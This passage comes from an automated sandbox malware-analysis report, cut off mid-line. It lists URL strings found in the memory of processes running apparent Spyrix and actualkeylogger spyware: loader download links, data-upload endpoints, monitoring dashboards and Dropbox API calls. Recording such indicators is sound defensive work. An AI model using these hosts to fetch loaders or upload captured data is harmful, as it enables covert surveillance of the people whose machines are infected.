Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/copy?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/create_folder
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/create_folder?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/delete
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/delete?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/move
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/move?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/metadata/dropbox
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/metadata/sandbox
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/access_token
Source: spkl.exe	String found in binary or memory: https://api.dropbox.com/1/oauth/access_token?
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/access_token?SV
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/request_token
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/request_token?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/shares/dropbox
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/shares/sandbox
Source: [space]= .tmp, 00000013.00000003.2562658084.0000000003303000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cdndownload.net/proxy/list.json
Source: curl.exe, 0000000C.00000002.1788586012.0000000003280000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000003.1788331941.0000000003291000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788609338.0000000003295000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: curl.exe, 0000000C.00000003.1788444030.0000000003294000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000003.1788331941.0000000003291000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788609338.0000000003295000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk%
Source: curl.exe, 0000000C.00000003.1788444030.0000000003294000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000003.1788331941.0000000003291000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788609338.0000000003295000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkE
Source: curl.exe, 0000000C.00000002.1788586012.0000000003280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkG
Source: curl.exe, 0000000C.00000003.1788444030.0000000003294000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000003.1788331941.0000000003291000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788609338.0000000003295000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkM
Source: cmd.exe, 00000008.00000003.1751133117.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788586012.0000000003280000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788536775.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0
Source: curl.exe, 0000000C.00000002.1788647034.00000000032C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkX0
Source: cmd.exe, 00000008.00000003.1751133117.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788586012.0000000003280000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000C.00000002.1788536775.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.exe
Source: spkl.exe, 00000035.00000002.2984780387.0000000007D10000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2870771422.0000000007D8D000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2984780387.0000000007DBC000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2871310648.0000000007D84000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2958710472.0000000001910000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2989667203.0000000008736000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: qrl.exe, 00000043.00000002.2713886542.000000000106A000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2765239399.000000000106A000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2756141897.000000000106A000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004A.00000002.2767899122.000000000106A000.00000008.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/P
Source: spkl.exe, 00000035.00000002.2984780387.0000000007D59000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000043.00000002.2713886542.000000000106A000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2765239399.000000000106A000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2756141897.000000000106A000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004A.00000002.2767899122.000000000106A000.00000008.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
Source: qrl.exe, qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004A.00000002.2767609599.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: qrl.exe	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
Source: qrl.exe, qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004A.00000002.2767609599.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/docs/sslcerts.html
Source: qrl.exe	String found in binary or memory: https://curl.haxx.se/docs/sslcerts.htmlcurl
Source: qrl.exe, 0000004A.00000002.2767609599.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/libcurl/c/curl_easy_setopt.html
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.actualkeylogger.com
Source: spkl.exe	String found in binary or memory: https://dashboard.actualkeylogger.com/account/login-from-program
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.actualkeylogger.com/account/login-from-programspsMapspsJSON
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.clevercontrol.com/account/user-hash-gen
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com
Source: spkl.exe, 00000035.00000002.2984780387.0000000007DBC000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2871310648.0000000007D84000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2958710472.0000000001910000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2984780387.0000000007D8C000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2989667203.0000000008736000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2984780387.0000000007D9B000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2980946676.0000000006BBA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/
Source: spkl.exe, 00000035.00000002.2977775602.000000000652A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/.spyrix.com/
Source: spkl.exe, 00000035.00000002.2977775602.000000000652A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/.spyrix.com/6s
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/account/login-from-program
Source: [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/account/login-from-program?email=
Source: spkl.exe, 00000035.00000002.2971872040.00000000044E6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/ix.com/
Source: spkl.exe, 00000035.00000002.2977775602.000000000652A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/qqS
Source: spkl.exe, 00000035.00000002.2980946676.0000000006BBA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/x.com/
Source: [space]= .exe, 00000006.00000002.1984705669.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com
Source: curl.exe, 00000005.00000002.1700541419.000001295C1A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700375385.000001295C1BE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1700541419.000001295C1A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700285153.000001295C1BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1700541419.000001295C1BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
Source: curl.exe, 00000005.00000002.1700541419.000001295C1A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404.=
Source: curl.exe, 00000005.00000002.1700541419.000001295C1A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404103
Source: curl.exe, 00000005.00000003.1700375385.000001295C1BE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700285153.000001295C1BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1700541419.000001295C1BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/4047
Source: curl.exe, 00000005.00000003.1700375385.000001295C1BE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700285153.000001295C1BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1700541419.000001295C1BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404E
Source: curl.exe, 00000005.00000002.1700541419.000001295C1A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404Winsta0
Source: curl.exe, 00000005.00000002.1700541419.000001295C1A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404curl.exe
Source: curl.exe, 00000005.00000002.1700541419.000001295C1A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404k
Source: curl.exe, 00000005.00000002.1700541419.000001295C1A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404l=
Source: curl.exe, 00000005.00000003.1699852631.000001295C21F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1699926974.000001295C1C3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700101956.000001295C21F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700234054.000001295C21F000.00000004.00000020.00020000.00000000.sdmp, [space]= .exe, 00000006.00000002.1984705669.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/
Source: [space]= .exe, 00000006.00000002.1984705669.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s108
Source: svchost.exe, 00000007.00000003.1705313181.000002BE174F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000007.00000003.1705313181.000002BE1752F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000007.00000003.1705313181.000002BE174F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000007.00000003.1705313181.000002BE174D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000007.00000003.1705313181.000002BE174F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: svchost.exe, 00000007.00000003.1705313181.000002BE174F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000007.00000003.1705313181.000002BE174A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: curl.exe, 00000005.00000003.1699852631.000001295C21F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1699926974.000001295C1C3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700101956.000001295C21F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700234054.000001295C21F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://securcdn.com/loader/link.php?prg_id=sfkupowershell.exe
Source: [space]= .exe, 00000012.00000003.2049227259.0000000002440000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000012.00000003.2583732673.000000000226E000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2562658084.0000000003240000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2562658084.00000000032C7000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step1
Source: [space]= .exe, 00000012.00000003.2049227259.0000000002440000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000012.00000003.2583732673.000000000226E000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2562658084.0000000003240000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2562658084.00000000032C7000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step18
Source: [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step2
Source: spkl.exe, spkl.exe, 00000035.00000002.2980946676.0000000006C57000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/Uwas771wvshs7916gjqg62417/core.php
Source: spkl.exe, 00000035.00000003.2740720036.0000000001717000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/das
Source: [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/av
Source: qrl.exe, qrl.exe, 00000045.00000002.2766389640.0000000001790000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000002.2767714695.0000000001C5C000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000002.2767395081.0000000001C50000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000003.2745075392.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000003.2728540283.000000000145A000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2764912066.000000000145C000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2757133303.0000000001450000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2745068935.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004A.00000002.2768330875.0000000001550000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004A.00000002.2768430811.000000000155C000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004A.00000002.2768473168.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actions
Source: qrl.exe, 00000043.00000002.2715156517.00000000017E0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000043.00000002.2715484537.0000000001C60000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000043.00000002.2715104232.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000002.2766389640.0000000001790000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000002.2745815664.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2743891212.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2745068935.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004A.00000002.2768473168.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsC:
Source: qrl.exe, 0000004A.00000002.2768473168.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsJ
Source: qrl.exe, 00000047.00000002.2757133303.0000000001450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionse
Source: qrl.exe, 00000047.00000002.2757133303.0000000001450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsers
Source: qrl.exe, 00000043.00000003.2708573105.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000043.00000002.2715615199.0000000001C6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsll
Source: qrl.exe, 00000043.00000002.2715484537.0000000001C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsoad.spy
Source: qrl.exe, 00000045.00000002.2767395081.0000000001C50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsrDao
Source: qrl.exe, 0000004A.00000002.2768330875.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsriverDa
Source: qrl.exe, 00000045.00000002.2767395081.0000000001C50000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004A.00000002.2768330875.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionstps://s
Source: qrl.exe, 00000047.00000003.2728540283.000000000145A000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2764912066.000000000145C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsuu
Source: qrl.exe, 0000004A.00000002.2768430811.000000000155C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsuu/
Source: qrl.exe, 00000045.00000002.2767714695.0000000001C5C000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000003.2745075392.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsuu7
Source: spkl.exe, 00000035.00000003.2871385145.0000000001925000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2958710472.0000000001910000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsv
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/proxy/upload
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/rand.zip
Source: spkl.exe, spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/
Source: [space]= .tmp, 00000013.00000003.2562658084.0000000003303000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/access.txt
Source: [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/iorder.php?comp_id=
Source: spkl.exe, spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/iupload.php
Source: [space]= .tmp, 00000013.00000002.2581949502.0000000005460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spy
Source: WMIC.exe, 00000017.00000002.2085761747.000000000311C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-
Source: [space]= .tmp, 00000013.00000002.2581949502.0000000005460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/down
Source: [space]= .tmp, 00000013.00000002.2580954136.0000000002320000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000002.2085761747.0000000003151000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk
Source: spmm.exe, 00000049.00000002.2923596949.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_set
Source: curl.exe, 0000000D.00000002.2046191187.0000000002ED9000.00000004.00000020.00020000.00000000.sdmp, [space]= .exe, 00000012.00000002.2586374325.0000000000648000.00000004.00000020.00020000.00000000.sdmp, [space]= .exe, 00000012.00000002.2586638070.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000002.2580954136.0000000002320000.00000004.00000020.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000002.2578906847.0000000000708000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000002.2085634026.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000002.2085761747.000000000311C000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000002.2085761747.0000000003110000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000003.2103285428.000000000348E000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000003.2103164321.000000000348A000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000002.2103797195.0000000003680000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 